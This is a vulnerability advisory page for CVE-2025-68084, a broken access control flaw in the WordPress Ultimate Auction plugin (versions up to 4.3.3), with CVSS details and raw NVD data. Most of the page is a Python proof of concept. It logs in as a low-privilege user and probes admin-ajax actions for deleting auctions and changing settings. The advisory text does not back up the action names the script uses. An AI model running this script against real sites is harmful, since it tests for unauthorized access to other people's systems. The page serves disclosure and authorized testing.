Security Vulnerability Report
中文
CVE-2025-68084 CVSS 5.4 MEDIUM

CVE-2025-68084

Published: 2025-12-16 09:16:03
Last Modified: 2026-04-27 19:16:25

Description

Missing Authorization vulnerability in Nitesh Ultimate Auction ultimate-auction allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Auction : from n/a through <= 4.3.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Ultimate Auction Plugin <= 4.3.3
Nitesh Ultimate Auction 所有版本(从n/a到4.3.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68084 PoC - WordPress Ultimate Auction Broken Access Control # This PoC demonstrates exploiting the missing authorization vulnerability TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" # Low-privilege user account PASSWORD = "password123" def get_wp_nonce(login_url, cookies): """Extract WordPress nonce from page source""" try: response = requests.get(login_url, cookies=cookies, timeout=10) import re nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) if nonce_match: return nonce_match.group(1) except Exception as e: print(f"[-] Error getting nonce: {e}") return None def exploit_ultimate_auction_access_control(): """Exploit the missing authorization vulnerability""" # Step 1: Login as low-privilege user session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } print("[*] Step 1: Logging in as low-privilege user...") login_response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Try to access admin-only auction management functionality # This endpoint should require administrator privileges but lacks authorization check admin_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=ua_manage_auctions", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=ua_delete_auction", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=ua_modify_settings" ] print("[*] Step 2: Testing access to admin-only endpoints...") for endpoint in admin_endpoints: try: # Try to access without proper authorization response = session.get(endpoint, timeout=10) # Check if we get admin-level response instead of 403 Forbidden if response.status_code == 200 and 'success' in response.text: print(f"[!!] VULNERABLE: {endpoint}") print(f"[+] Response indicates unauthorized access was possible!") print(f"[+] Response snippet: {response.text[:200]}") elif response.status_code == 403: print(f"[-] Protected: {endpoint}") else: print(f"[*] Endpoint response: {endpoint} - Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-68084 PoC - Ultimate Auction Broken Access Control") print("=" * 60) exploit_ultimate_auction_access_control()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68084", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:03.497", "lastModified": "2026-04-27T19:16:25.230", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Nitesh Ultimate Auction ultimate-auction allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Auction : from n/a through <= 4.3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ultimate-auction/vulnerability/wordpress-ultimate-auction-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}